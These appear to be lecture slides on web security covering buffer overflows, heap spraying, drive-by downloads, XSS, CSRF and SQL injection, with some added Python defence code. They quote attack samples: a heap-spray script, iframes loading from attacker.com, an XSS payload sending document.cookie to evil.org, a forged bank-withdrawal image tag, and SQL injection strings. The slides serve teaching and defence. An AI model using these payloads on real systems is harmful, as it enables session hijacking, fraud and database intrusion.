1 Web Security Dr. 許 富 皓 Department of Computer Science and Information Engineering, National...
1
Web Security
Dr. 許 富 皓, Department of Computer Science and Information Engineering,
National Central University
2
Stack Smashing Attacks
3
Principle of Stack Smashing Attacks
Overwrite control transfer structures, such as return addresses or function pointers, to redirect the program's execution flow to code of the attacker's choosing.
Attack strings carry both code and address(es) of the code entry point.
4
A Linux Process Layout and Stack Operations
[Figure: Linux process layout, from low address to high address: code, data, BSS, heap, libraries, stack, then env, argv, argc, and above them the kernel address space. The stack grows downward as main() calls G(1) and G calls H(3); the frames of main, G and H lie in that order, and the figure also marks EIP.]
main()
{
    :
    G(1);
}
void G(int a)
{
    :
    H(3);
}
void H(int c)
{
    :
}
5
Explanation of BOAs (1)
[Figure: H's stack frame after the input string "abc" has been read. From low to high address: c[0] .. c[99] (with the input bytes a, b, c stored at 0xaba, 0xabb, 0xabc), i, the saved frame pointer (address of G's frame pointer), the return address add_g, and the argument b; esp marks the bottom of the frame and ebp the saved frame pointer. G's stack frame lies above.]
G(int a)
{
    H(3);
add_g:
}
H(int b)
{
    char c[100];
    int i = 0;
    while ((c[i++] = getch()) != EOF)
    {
    }
}
6
Explanation of BOAs (2)
[Figure: the same frame after the attack string has been read. Attack String: xx...Injected Code...x y 0xabc, Length = 108 bytes (each x is 1 byte, y is 4 bytes). The string overflows c[0..99], and the final 4 bytes, 0xabc, overwrite the return address add_g with the address of the injected code stored inside c[], so when H returns, execution continues in the injected code. G and H are the same as on the previous slide.]
7
Injected Code
The attacked programs usually have root privilege; therefore, the injected code is executed with root privilege.
The injected code is already in machine-instruction form, so a CPU can execute it directly. However, this also means that the injected code must match the CPU type of the attacked host.
Usually the injected code forks a shell; hence, after an attack, the attacker has a root shell.
8
Heap Spray and Drive-by Download
9
Heap Spray [Wikipedia][Nozzle]
Heap spraying is a technique used in exploits to facilitate arbitrary code execution.
Heap spraying is a security threat using a strategy of allocating many objects containing the attacker’s exploit code in an application’s heap.
Heap spraying requires that an attacker use another memory corruption exploit to trigger an attack, but the act of spraying greatly simplifies the attack and increases its likelihood of success.
10
Heap Spray Overview [Puttaraksa]
11
Implementation - JavaScript
Heap sprays for web browsers are commonly implemented in JavaScript and spray the heap by making copies of a long string and storing these strings in an array, up to the point where enough memory has been sprayed to cover the area that the exploit targets.
P.S.: The long string begins with a NOP sled and ends with shellcode.
12
Implementation - ActionScript
In July 2009, exploits were found to be using ActionScript to spray the heap in Adobe Flash.
13
Implementation - Images
Though it has been proven that heap spraying can be done through other means, for instance by loading image files into the process, this has not seen widespread use (as of August 2008).
Memory Corruption Exploit
14
15
Sources of Memory Corruption Exploit
Mishandling Tag Attribute Values
Virtual Table
…
16
Mishandling Tag Attribute Values (1)
HTTP MS IE Malf. IFRAME/EMBED BO [Symantec]
It is reported that an attacker can exploit this condition by creating a malicious Web page containing a malformed IFRAME, FRAME or EMBED tag.
Specifically, the attacker creates the IFRAME, FRAME or EMBED tag by specifying large string values for the 'SRC' and 'NAME' properties.
These values are copied into finite sized process buffers resulting in memory corruption.
17
Mishandling Tag Attribute Values (2)[Julam]
<IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
::
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"></IFRAME>
Result: eip stops at address 0x769f682f
18
Mishandling Tag Attribute Values (3)[Julam]
memory = new Array();
for (i=0;i<700;i++)
memory[i] = block + shellcode;
19
Virtual Table [Foster et al.]
The virtual table is a lookup table of functions used to resolve function calls in a dynamic/late binding manner.
Class objects and structures are often stored on the heap.
One field of a class object is a pointer to its virtual table, called the virtual-function table pointer.
20
Virtual Table [Foster et al.] – Overview
[Figure: two adjacent heap objects, each laid out as a *__vptr field followed by char a[100].]
21
Virtual Table [Ratanaworabhan et al.] – Spraying the Heap
<SCRIPT language="text/javascript">
shellcode = unescape("%u4343%u4343%...");
oneblock = unescape("%u0D0D%u0D0D");
var fullblock = oneblock;
while (fullblock.length < 0x40000) { fullblock += fullblock; }
sprayContainer = new Array();
for (i = 0; i < 1000; i++) { sprayContainer[i] = fullblock + shellcode; }
</SCRIPT>
[Figure: each sprayed block consists of a NOP sled (the repeated 0x0D0D bytes of fullblock) followed by the shell code.]
22
Result
Because the size of the sprayed heap area may be tens of MBs, ASLR may not work as expected.
23
Drive-by Download Attacks [wikipedia]
Download of spyware, a computer virus, or any kind of malware that happens without knowledge of the user.
Drive-by downloads may happen by
visiting a website,
viewing an e-mail message, or
clicking on a deceptive popup window.
24
Clicking on a Deceptive Popup Window
For instance, a user clicks on the window in the mistaken belief that it is an error report from his own PC or that it is an innocuous advertisement popup.
In such cases, the "supplier" may claim that the user "consented" to the download though he was completely unaware of having initiated a malicious software download.
25
Drive-by Downloads Using Web Pages
Features:
1. Same appearance as the original webpage
2. Secret downloads
3. Automatic installation
4. Based on vulnerabilities of browsers, plug-ins, or OSes
26
[Figure: a good web server, a vulnerable browser (client side, WWW) and a malicious web server. The page served by the good web server has been modified to carry an invisible frame and a script that point at the attacker's server, attacker.com, which hosts bad.htm and bad.js:]
<iframe src="http://attacker.com/bad.htm" height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>
27
[Figure: the same scenario with a second stage. bad.htm on attacker.com contains a document.write(unescape("...")) call whose percent-encoded argument decodes to further script; a second malicious server, attacker2.com, also appears in the figure. The encoded payload is omitted here.]
28
Discuss
Why not inject shell code at the first stage? (i.e. inject shell code into the "good web server" directly)
29
Drive-by Downloads
Why Drive-by Downloads?
Deploy malware on computers of victims
Large scale (vs. targeted attacks)
Bypass firewalls or NAT protection
Current solutions
Static web-page analysis
Web-site reputation
Microsoft Killbit
30
HTTP Cookie [Wikipedia]
31
HTTP Cookies
HTTP cookies, sometimes known as web cookies or just cookies, are parcels of text sent by a server to a web browser and then sent back unchanged by the browser each time it accesses that server.
HTTP cookies are used for
authenticating,
tracking, and
maintaining specific information about users, such as site preferences or the contents of their electronic shopping carts.
The term "cookie" is derived from "magic cookie," a well-known concept in Unix computing which inspired both the idea and the name of HTTP cookies.
32
Cookie Delivery
33
Examine the Cookies
Most browsers supporting JavaScript allow the user to see the cookies that are active with respect to a given page by typing javascript:alert("Cookies: "+document.cookie) in the browser URL field.
Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.
34
Third-party Cookies
While cookies are only sent to the server setting them or one in the same Internet domain,
a Web page may contain images or other components stored on servers in other domains.
Cookies that are set during retrieval of these components are called third-party cookies.
35
Using Third-party Cookies to Track a User’s Activity
Advertising companies use third-party cookies to track a user across multiple sites.
In particular, an advertising company can track a user across all pages where it has placed advertising images or Web bugs.
Knowledge of the pages visited by a user allows the advertisement company to target advertisement to the user's presumed preferences.
36
Tracking Example
37
Privacy Threat
The possibility of building a profile of users has been considered by some a potential privacy threat, even when the tracking is done on a single domain but especially when tracking is done across multiple domains using third-party cookies. For the above reason, some countries have legislation about cookies.
38
Cross-site Scripting
Categories
Non-persistent XSS (Reflected XSS): the most common type nowadays
Persistent XSS
39
40
Non-persistent XSS
41
Through Hyperlinks
An attacker may be able to embed their malicious code within a hyperlink to the target site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site (trusted.org) sends a page back to the browser including the value of criteria without validating the user-supplied input, which consequently forces the execution of code from the attacker's server (evil.org). For example:
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A>
In the attack above, one source is inserting code into pages sent by another source.
It should be noted that this attack:
• disguises the link as a link to http://trusted.org,
• can be easily included in an HTML email message,
• does not supply the malicious code inline; it is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.
[Figure: the web browser follows the link to trusted.org and receives the page with the injected script.]
42
Ways to Deploy Hyperlinks
The user will most likely click on this link from another website, an instant message, or simply while reading a web board or email message.
43
Non-persistent Cross Site Scripting (XSS)
A non-persistent cross-site scripting (XSS) vulnerability is caused by the failure of a web-based application to validate user-supplied input before returning it to the client system.
By causing the victim’s browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions which can result in cookie theft, account hijacking, changing of web application account settings, spreading of a webmail virus, etc.
44
The Most Common Victims to Non-persistent XSS
The most common web components that fall victim to XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn't necessarily have to click on a link; XSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.
[Figure: each of these components could generate a web page.]
45
Hijack Web Application Sessions
The most popular (and devastating) XSS attack is the harvesting of authentication cookies and session management tokens.
With this information, it is often a trivial exercise for an attacker to hijack the victim's active session, completely bypassing the authentication process.
46
Traditional Non-persistent XSS Web Application Hijack Scenario (1)
1. The attacker investigates an interesting site
• that normal users must authenticate to gain access to and
• that tracks the authenticated user through the use of cookies or session IDs.
2. The attacker finds an XSS-vulnerable page on the site, for instance http://trusted.org/account.asp.
3. Using a little social engineering,
• the attacker creates a special link to the site and
• embeds it in an HTML email that he sends to a long list of potential victims.
47
Traditional Non-persistent XSS Web Application Hijack Scenario (2)
4. Embedded within the special link are some coding elements specially designed to transmit a copy of the victim's cookie back to the attacker. For instance:
<img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie); </script>">
5. Unknown to the victim, the attacker has now received a copy of their cookie information.
The attacker now visits the web site and, by substituting his cookie information with that of the victim, is now perceived to be the victim by the server application.
48
Traditional Non-persistent XSS Web Application Hijack Steps [David Endler]
49
SOLUTIONS AND WORKAROUNDS [David Endler]
50
For Users
As a web application user, there are a few ways to protect yourself from XSS attacks. The first and most effective solution is to
disable all scripting language support in your browser and email reader.
If this is not a feasible option for business reasons, another recommendation is to use reasonable caution when clicking links in anonymous e-mails and dubious web pages.
51
Web Application Developers and Vendors
Web application developers and vendors should ensure that all user input is parsed and filtered properly. User input includes
things stored in GET Query strings, POST data, Cookies, URLs, and in general any persistent data that is transmitted
between the browser and web server.
52
User Input Filtering
The best philosophy to follow regarding user input filtering is to deny all but a pre-selected set of benign characters in the web input stream. This prevents developers from having to constantly predict and update all forms of malicious input in order to deny only specific characters (such as < ; ? etc.).
Some decent guidelines for input filtering can be found in the OWASP Requirements document “OWASP Guide to Building Secure Web Applications and Web Services".
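As an added example (not from the slides or Endler's text), the allow-list philosophy above applied to the search.cgi hyperlink attack from the earlier slide, in Python: a hypothetical response builder that rejects any value outside a benign character set and HTML-encodes whatever it reflects, shown beside the vulnerable verbatim echo so both can be checked against the real payload. The function names, the allowed character set and the page markup are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for the "criteria" search parameter: letters, digits, space and a
# few punctuation marks, at most 64 characters. Everything else is rejected,
# instead of trying to enumerate dangerous characters such as < ; ? one by one.
CRITERIA_ALLOWED = re.compile(r"[A-Za-z0-9 ._-]{1,64}")


def criteria_is_benign(value: str) -> bool:
    """True only when the whole value consists of allow-listed characters."""
    return CRITERIA_ALLOWED.fullmatch(value) is not None


def criteria_from_url(url: str) -> str:
    """Pull the 'criteria' query parameter out of a search.cgi URL."""
    return parse_qs(urlsplit(url).query).get("criteria", [""])[0]


def reflected_unsafely(criteria: str) -> str:
    """The vulnerable behaviour from the slides: the value is echoed verbatim,
    so a value containing <SCRIPT ...> becomes live markup in the response."""
    return "<p>Results for: " + criteria + "</p>"


def render_search_page(criteria: str) -> str:
    """Hypothetical hardened search.cgi response builder (not from the slides).

    Two independent layers: the allow-list decides whether the value is even
    accepted, and html.escape() encodes whatever is reflected so that '<',
    '>', '&', '"' and "'" can never open a tag or break out of an attribute."""
    shown = criteria if criteria_is_benign(criteria) else "[rejected search term]"
    return "<p>Results for: " + html.escape(shown, quote=True) + "</p>"


def contains_live_script(page: str) -> bool:
    """Crude response check: is there an un-encoded <script ...> tag in the body?"""
    return re.search(r"<script[\s>]", page, re.IGNORECASE) is not None


# Constructed inputs: the hyperlink payload quoted on the slide and a benign search.
ATTACK_URL = ("http://trusted.org/search.cgi?criteria="
              "<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>")
BENIGN_URL = "http://trusted.org/search.cgi?criteria=web+security"

if __name__ == "__main__":
    for url in (ATTACK_URL, BENIGN_URL):
        value = criteria_from_url(url)
        print(repr(value), "benign:", criteria_is_benign(value))
        print("  unsafe  :", reflected_unsafely(value))
        print("  hardened:", render_search_page(value))
```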
53
Test
Once an application has evolved out of the design and development phases, it is important to periodically test for XSS vulnerabilities, since application functionality is constantly changing due to
upgrades,
integration of third-party technologies, and
decentralized website authoring.
54
Vulnerability Web Application Scanners
Many web application vulnerability scanners are starting to include checks for XSS. The OWASP Testing group plans to produce a methodology for checking XSS on a web application.
WebScarab
55
Examples Used to Bypass Detection
XSS Cheat Sheet
56
XSS Tool
XSS-Proxy
57
Cross-site Request Forgery [Wikipedia]
58
Definition
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
59
Background
CSRF vulnerabilities have been known and in some cases exploited since the 1990s.
Because it is carried out from the user's IP address, CSRF is untraceable without proper logging.
60
Impact
As of 2007 there are few well-documented examples.
About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008.
Customers of a bank in Mexico were attacked in early 2008 with an image tag in email.
61
Example
One user, Bob, might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references a script on Bob's bank's website (rather than an image file), e.g.,
<img src="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory">
If Bob's bank keeps his authentication information in a cookie
and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will
submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
62
Common CSRF Characteristics
Involve sites that rely on a user's identity
Exploit the site's trust in that identity
Trick the user's browser into sending HTTP requests to a target site
Involve HTTP requests that have side effects
63
Common CSRF Victims
At risk are web applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action.
A user that is authenticated by a cookie saved in his web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action.
64
Common CSRF Pitfalls
CSRF attacks using images are often made from Internet forums, where users are allowed to post images but not JavaScript.
65
CSRF Assumptions
This attack relies on a few assumptions:
The attacker has knowledge of sites on which the victim has current authentication (more common on web forums, where this attack is most common)
The attacker's "target site" has authentication cookies, or the victim has a current session cookie with the target site
The "target site" doesn't have secondary authentication for actions (such as form tokens)
66
Example
Assume a script in the document at http://store.company.com/dir/other.html executes the following statement:
document.domain = "company.com";
After that statement executes, the page would pass the origin check with http://company.com/dir/page.html.
However, by the same reasoning, company.com could not set document.domain to othercompany.com.
67
Prevention
For the web site, switching from a persistent authentication method (e.g. a cookie or HTTP authentication) to a transient authentication method (e.g. a hidden field of a form, provided on every form) will help prevent these attacks.
A similar approach is to include a secret, user-specific token in forms (a field of a form filled out by a user) that is verified in addition to the cookie.
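Added example, not from the slides or Wikipedia: a Python sketch of the secret, user-specific token approach, applied to the bank withdrawal scenario from the Example slide. The token is an HMAC over the session id and the action name under a server-side key, so a forged `<img>` request that carries only Bob's cookie is refused; the handler, form markup, key and session ids are constructed for this illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Server-side secret; constructed here, loaded from configuration in practice.
SERVER_KEY = secrets.token_bytes(32)


def csrf_token_for(session_id: str, action: str) -> str:
    """Derive the per-user, per-form token that goes into the hidden field.
    Keyed HMAC over the session id and the action name: unique to this user
    and not computable by anyone who lacks SERVER_KEY."""
    msg = (session_id + "|" + action).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def withdraw_form_html(session_id: str) -> str:
    """Form the bank serves to the logged-in user (hypothetical markup)."""
    tok = csrf_token_for(session_id, "withdraw")
    return ('<form method="post" action="/withdraw">'
            f'<input type="hidden" name="csrf" value="{tok}">'
            '<input name="amount"><input name="for"></form>')


def handle_withdraw(cookie_session_id: str, method: str, params: dict) -> str:
    """Decide whether a request to /withdraw is authorised. The cookie alone is
    never enough: the request must be a POST and must carry the token that only
    a page rendered for this very session could have contained."""
    if method != "POST":
        return "rejected: state-changing action must be POST"
    expected = csrf_token_for(cookie_session_id, "withdraw")
    supplied = params.get("csrf", "")
    # Constant-time comparison on bytes (compare_digest rejects non-ASCII str).
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected: missing or wrong CSRF token"
    return f"ok: withdraw {params.get('amount')} for {params.get('for')}"


def forged_image_request(url: str):
    """What Bob's browser sends when it loads Mallory's <img>: a GET carrying
    the URL's query parameters and Bob's cookie, but no token."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    return "GET", params


# Constructed scenario built around the forged URL quoted on the slide.
BOB_SESSION = "sess-bob-0001"
FORGED_URL = "http://bank.example/withdraw?account=bob&amount=1000000&for=mallory"

if __name__ == "__main__":
    method, params = forged_image_request(FORGED_URL)
    print("forged <img> load :", handle_withdraw(BOB_SESSION, method, params))
    print("forged POST       :", handle_withdraw(BOB_SESSION, "POST", params))
    good = {"csrf": csrf_token_for(BOB_SESSION, "withdraw"), "amount": "10", "for": "rent"}
    print("Bob's own form    :", handle_withdraw(BOB_SESSION, "POST", good))
```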
68
SQL Injection [SK]
69
What is SQL Injection?
Many web pages take parameters from web users and make SQL queries to the database. For instance, when a user logs in to a web page, the web page accepts that user name and password and makes an SQL query to the database to check whether the user has a valid name and password.
With SQL injection, it is possible to send a crafted user name and/or password field that changes the SQL query and thus grants something else.
70
SQL Injection Attack Channels
SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy.
It attacks the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or services running in the OS.
71
What Should You Look for?
Try to look for pages that allow you to submit data, i.e. login page, search page, feedback, etc.
Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag. You may find something like this:
<FORM action=Search/search.asp method=post><input type=hidden name=A value=C></FORM>
Everything between <FORM> and </FORM> has potential parameters that might be useful (exploit-wise).
72
What If You Can't Find Any Page That Takes Input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URLs that take parameters, like:
http://duck/index.asp?id=10
73
How Do You Test If It Is Vulnerable?
Start with the single quote trick. Input something like: hi' or 1=1--
into the login, the password, or even the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If luck is on your side, you will get logged in without any login name or password.
74
Hidden Field
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly.
Example:
<FORM action=http://duck/Search/search.asp method=post><input type=hidden name=A value="hi' or 1=1--"></FORM>
75
Database Table Example [CQU]
76
Database Table product
PName      PCategory   price  number  bar code
bread      food         30     100    100-234-7
cake       food        300      20    100-987-6
cookie     food         50      70    100-812-9
model car  toy         200      20    300-567-7
figure     toy         300      80    300-987-9
paper      stationery    0.5  5000    981-897-7
pen        stationery   20     300    981-967-0
77
Web Application Input and Its Corresponding SQL Query
Take an ASP page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, the ASP page might contain the following code:
v_cat = request("category")
sqlstr = "SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs = conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a result set containing one or more rows that match the WHERE condition, in this case, 'food'.
78
Why ' or 1=1-- ?
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now our variable v_cat equals "food' or 1=1-- "; if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes, it may be possible to replace the double dash with a single hash "#".
79
Other Crafted Input (1)
However, if the database is not SQL Server, or you simply cannot ignore the rest of the query, you may also try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
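Added example (not from the slides or [SK]): the ASP category query and the login check from the earlier slides, rebuilt in Python against an in-memory SQLite copy of the product table, with the string-concatenated form beside the parameterized one that defends against it. SQLite is an assumption made so the example runs stand-alone (the slides use MS SQL Server); the users table, its one row and the column name barcode are constructed for this illustration.

```python
import sqlite3

# The product table from the slides, plus a one-row users table for the login
# example. SQLite, like MS SQL Server, treats "--" as a comment to end of line.
PRODUCTS = [
    ("bread", "food", 30, 100, "100-234-7"),
    ("cake", "food", 300, 20, "100-987-6"),
    ("cookie", "food", 50, 70, "100-812-9"),
    ("model car", "toy", 200, 20, "300-567-7"),
    ("figure", "toy", 300, 80, "300-987-9"),
    ("paper", "stationery", 0.5, 5000, "981-897-7"),
    ("pen", "stationery", 20, 300, "981-967-0"),
]


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (PName TEXT, PCategory TEXT, "
                 "price REAL, number INTEGER, barcode TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?, ?, ?)", PRODUCTS)
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    # Constructed credentials; a real table would hold a password hash.
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", "s3cret"))
    return conn


def query_concatenated(conn, v_cat: str) -> list:
    """Python rendering of the ASP code on the slide: v_cat is spliced into the
    SQL text, so a quote inside it rewrites the statement itself."""
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    return conn.execute(sqlstr).fetchall()


def query_parameterized(conn, v_cat: str) -> list:
    """Hardened form: the value is bound as a parameter and compared literally,
    so  food' or 1=1--  is just a category name that no row has."""
    return conn.execute("SELECT * FROM product WHERE PCategory=?",
                        (v_cat,)).fetchall()


def login_concatenated(conn, name: str, pw: str) -> bool:
    """Vulnerable login check built the same way as the slides' query;
    the  hi' or 1=1--  trick turns the WHERE clause into an always-true test."""
    sqlstr = ("SELECT * FROM users WHERE name='" + name +
              "' AND pass='" + pw + "'")
    return conn.execute(sqlstr).fetchone() is not None


def login_parameterized(conn, name: str, pw: str) -> bool:
    """Same check with bound parameters; only the real credentials match."""
    row = conn.execute("SELECT * FROM users WHERE name=? AND pass=?",
                       (name, pw)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = open_db()
    for v in ("food", "food' or 1=1--", "food' or 'a'='a"):
        print(repr(v), len(query_concatenated(db, v)), "rows concatenated,",
              len(query_parameterized(db, v)), "rows parameterized")
    trick = "hi' or 1=1--"
    print("concatenated login accepts trick:", login_concatenated(db, trick, trick))
    print("parameterized login accepts trick:", login_parameterized(db, trick, trick))
```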
80
Other Crafted Input (2)
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a